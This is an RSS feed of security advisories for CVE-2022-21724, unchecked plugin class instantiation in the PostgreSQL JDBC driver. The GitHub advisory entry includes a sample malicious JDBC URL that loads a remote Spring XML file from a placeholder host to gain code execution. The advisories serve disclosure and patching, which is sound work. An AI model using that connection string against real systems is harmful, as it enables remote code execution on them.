<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Fri, 02 Oct 2026 16:26:29 +0000</lastBuildDate>
    <item>
      <title>bdu:2022-00821</title>
      <link>https://cve.radiocsirt.org/vuln/bdu:2022-00821</link>
      <description>bdu:2022-00821</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/bdu:2022-00821</guid>
    </item>
    <item>
      <title>certfr-2022-avi-106 — Une vulnérabilité a été découverte dans PostgreSQL JDBC. Elle permet à
un attaquant de provoquer une exécution de code…</title>
      <link>https://cve.radiocsirt.org/vuln/certfr-2022-avi-106</link>
      <description>certfr-2022-avi-106</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/certfr-2022-avi-106</guid>
    </item>
    <item>
      <title>EUVD-2026-237410</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-237410</link>
      <description>EUVD-2026-237410</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-237410</guid>
    </item>
    <item>
      <title>fkie_cve-2022-21724</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2022-21724</link>
      <description>&lt;p&gt;pgjdbc is the offical PostgreSQL JDBC Driver. A security hole was found in the jdbc driver for postgresql database while doing security research. The system using the postgresql library will be attacked when attacker control the jdbc url or properties. pgjdbc instantiates plugin instances based on class names provided via `authenticationPluginClassName`, `sslhostnameverifier`, `socketFactory`, `sslfactory`, `sslpasswordcallback` connection properties. However, the driver did not verify if the class implements the expected interface before instantiating the class. This can lead to code execution loaded via arbitrary classes. Users using plugins are advised to upgrade. There are no known workarounds for this issue.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;pgjdbc is the offical PostgreSQL JDBC Driver. A security hole was found in the jdbc driver for postgresql database while doing security research. The system using the postgresql library will be attacked when attacker control the jdbc url or properties. pgjdbc instantiates plugin instances based on class names provided via `authenticationPluginClassName`, `sslhostnameverifier`, `socketFactory`, `sslfactory`, `sslpasswordcallback` connection properties. However, the driver did not verify if the class implements the expected interface before instantiating the class. This can lead to code execution loaded via arbitrary classes. Users using plugins are advised to upgrade. There are no known workarounds for this issue.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2022-21724</guid>
    </item>
    <item>
      <title>GHSA-v7wg-cpwc-24m4 — pgjdbc Does Not Check Class Instantiation when providing Plugin Classes</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-v7wg-cpwc-24m4</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Maven: org.postgresql:postgresql&lt;/p&gt;
&lt;p&gt;### Impact&lt;/p&gt;
&lt;p&gt;pgjdbc instantiates plugin instances based on class names provided via `authenticationPluginClassName`, `sslhostnameverifier`, `socketFactory`, `sslfactory`, `sslpasswordcallback` connection properties.&lt;/p&gt;
&lt;p&gt;However, the driver did not verify if the class implements the expected interface before instantiating the class.&lt;/p&gt;
&lt;p&gt;Here&amp;#39;s an example attack using an out-of-the-box class from Spring Framework:&lt;/p&gt;
&lt;p&gt;```
DriverManager.getConnection(&amp;#34;jdbc:postgresql://node1/test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&amp;amp;socketFactoryArg=http://target/exp.xml&amp;#34;);
```&lt;/p&gt;
&lt;p&gt;The first impacted version is REL9.4.1208 (it introduced `socketFactory` connection property)&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Maven: org.postgresql:postgresql&lt;/p&gt;
&lt;p&gt;### Impact&lt;/p&gt;
&lt;p&gt;pgjdbc instantiates plugin instances based on class names provided via `authenticationPluginClassName`, `sslhostnameverifier`, `socketFactory`, `sslfactory`, `sslpasswordcallback` connection properties.&lt;/p&gt;
&lt;p&gt;However, the driver did not verify if the class implements the expected interface before instantiating the class.&lt;/p&gt;
&lt;p&gt;Here&amp;#39;s an example attack using an out-of-the-box class from Spring Framework:&lt;/p&gt;
&lt;p&gt;```
DriverManager.getConnection(&amp;#34;jdbc:postgresql://node1/test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&amp;amp;socketFactoryArg=http://target/exp.xml&amp;#34;);
```&lt;/p&gt;
&lt;p&gt;The first impacted version is REL9.4.1208 (it introduced `socketFactory` connection property)&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-v7wg-cpwc-24m4</guid>
    </item>
    <item>
      <title>gsd-2022-21724</title>
      <link>https://cve.radiocsirt.org/vuln/gsd-2022-21724</link>
      <description>gsd-2022-21724</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/gsd-2022-21724</guid>
    </item>
    <item>
      <title>OESA-2022-1535 — postgresql-jdbc security update</title>
      <link>https://cve.radiocsirt.org/vuln/oesa-2022-1535</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; openEuler:20.03-LTS-SP1: postgresql-jdbc, openEuler:20.03-LTS-SP2: postgresql-jdbc, openEuler:20.03-LTS-SP3: postgresql-jdbc&lt;/p&gt;
&lt;p&gt;PostgreSQL JDBC Driver (PgJDBC for short) allows Java programs to connect to a PostgreSQL database using standard, database independent Java code. Is an open source JDBC driver written in Pure Java (Type 4), and communicates in the PostgreSQL native network protocol.&#13;
&#13;
Security Fix(es):&#13;
&#13;
pgjdbc is the offical PostgreSQL JDBC Driver. A security hole was found in the jdbc driver for postgresql database while doing security research. The system using the postgresql library will be attacked when attacker control the jdbc url or properties. pgjdbc instantiates plugin instances based on class names provided via `authenticationPluginClassName`, `sslhostnameverifier`, `socketFactory`, `sslfactory`, `sslpasswordcallback` connection properties. However, the driver did not verify if the class implements the expected interface before instantiating the class. This can lead to code execution loaded via arbitrary classes. Users using plugins are advised to upgrade. There are no known workarounds for this issue.(CVE-2022-21724)&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; openEuler:20.03-LTS-SP1: postgresql-jdbc, openEuler:20.03-LTS-SP2: postgresql-jdbc, openEuler:20.03-LTS-SP3: postgresql-jdbc&lt;/p&gt;
&lt;p&gt;PostgreSQL JDBC Driver (PgJDBC for short) allows Java programs to connect to a PostgreSQL database using standard, database independent Java code. Is an open source JDBC driver written in Pure Java (Type 4), and communicates in the PostgreSQL native network protocol.&#13;
&#13;
Security Fix(es):&#13;
&#13;
pgjdbc is the offical PostgreSQL JDBC Driver. A security hole was found in the jdbc driver for postgresql database while doing security research. The system using the postgresql library will be attacked when attacker control the jdbc url or properties. pgjdbc instantiates plugin instances based on class names provided via `authenticationPluginClassName`, `sslhostnameverifier`, `socketFactory`, `sslfactory`, `sslpasswordcallback` connection properties. However, the driver did not verify if the class implements the expected interface before instantiating the class. This can lead to code execution loaded via arbitrary classes. Users using plugins are advised to upgrade. There are no known workarounds for this issue.(CVE-2022-21724)&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/oesa-2022-1535</guid>
    </item>
    <item>
      <title>RHSA-2022:4623 — Red Hat Security Advisory: Red Hat build of Quarkus 2.7.5 release and security update</title>
      <link>https://cve.radiocsirt.org/vuln/rhsa-2022:4623</link>
      <description>&lt;p&gt;smallrye-health-ui: persistent cross-site scripting in endpoint protobuf-java: potential DoS in the parsing procedure for binary data gradle: repository content filters do not work in Settings pluginManagement gradle: local privilege escalation through system temporary directory gradle: information disclosure through temporary directory permissions netty: control chars in header names may lead to HTTP request smuggling quarkus: privilege escalation vulnerability with RestEasy Reactive scope leakage in Quarkus mysql-connector-java: Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Connectors jdbc-postgresql: Unchecked Class Instantiation when providing Plugin Classes&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;smallrye-health-ui: persistent cross-site scripting in endpoint protobuf-java: potential DoS in the parsing procedure for binary data gradle: repository content filters do not work in Settings pluginManagement gradle: local privilege escalation through system temporary directory gradle: information disclosure through temporary directory permissions netty: control chars in header names may lead to HTTP request smuggling quarkus: privilege escalation vulnerability with RestEasy Reactive scope leakage in Quarkus mysql-connector-java: Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Connectors jdbc-postgresql: Unchecked Class Instantiation when providing Plugin Classes&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/rhsa-2022:4623</guid>
    </item>
    <item>
      <title>SUSE-SU-2022:2143-1 — Recommended update for SUSE Manager 4.1.15 Release Notes</title>
      <link>https://cve.radiocsirt.org/vuln/suse-su-2022:2143-1</link>
      <description>&lt;p&gt;Recommended update for SUSE Manager 4.1.15 Release Notes&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Recommended update for SUSE Manager 4.1.15 Release Notes&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/suse-su-2022:2143-1</guid>
    </item>
    <item>
      <title>UBUNTU-CVE-2022-21724</title>
      <link>https://cve.radiocsirt.org/vuln/ubuntu-cve-2022-21724</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Ubuntu:14.04:LTS: libpgjava, Ubuntu:16.04:LTS: libpgjava, Ubuntu:Pro:18.04:LTS: libpgjava, Ubuntu:Pro:20.04:LTS: libpgjava, Ubuntu:22.04:LTS: libpgjava&lt;/p&gt;
&lt;p&gt;pgjdbc is the offical PostgreSQL JDBC Driver. A security hole was found in the jdbc driver for postgresql database while doing security research. The system using the postgresql library will be attacked when attacker control the jdbc url or properties. pgjdbc instantiates plugin instances based on class names provided via `authenticationPluginClassName`, `sslhostnameverifier`, `socketFactory`, `sslfactory`, `sslpasswordcallback` connection properties. However, the driver did not verify if the class implements the expected interface before instantiating the class. This can lead to code execution loaded via arbitrary classes. Users using plugins are advised to upgrade. There are no known workarounds for this issue.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Ubuntu:14.04:LTS: libpgjava, Ubuntu:16.04:LTS: libpgjava, Ubuntu:Pro:18.04:LTS: libpgjava, Ubuntu:Pro:20.04:LTS: libpgjava, Ubuntu:22.04:LTS: libpgjava&lt;/p&gt;
&lt;p&gt;pgjdbc is the offical PostgreSQL JDBC Driver. A security hole was found in the jdbc driver for postgresql database while doing security research. The system using the postgresql library will be attacked when attacker control the jdbc url or properties. pgjdbc instantiates plugin instances based on class names provided via `authenticationPluginClassName`, `sslhostnameverifier`, `socketFactory`, `sslfactory`, `sslpasswordcallback` connection properties. However, the driver did not verify if the class implements the expected interface before instantiating the class. This can lead to code execution loaded via arbitrary classes. Users using plugins are advised to upgrade. There are no known workarounds for this issue.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ubuntu-cve-2022-21724</guid>
    </item>
    <item>
      <title>WID-SEC-W-2022-0416 — PostgreSQL JDBC Treiber: Schwachstelle ermöglicht Codeausführung</title>
      <link>https://cve.radiocsirt.org/vuln/wid-sec-w-2022-0416</link>
      <description>&lt;p&gt;Ein entfernter, authentisierter Angreifer kann eine Schwachstelle im PostgreSQL JDBC Treiber ausnutzen, um beliebigen Programmcode auszuführen.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Ein entfernter, authentisierter Angreifer kann eine Schwachstelle im PostgreSQL JDBC Treiber ausnutzen, um beliebigen Programmcode auszuführen.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/wid-sec-w-2022-0416</guid>
    </item>
  </channel>
</rss>
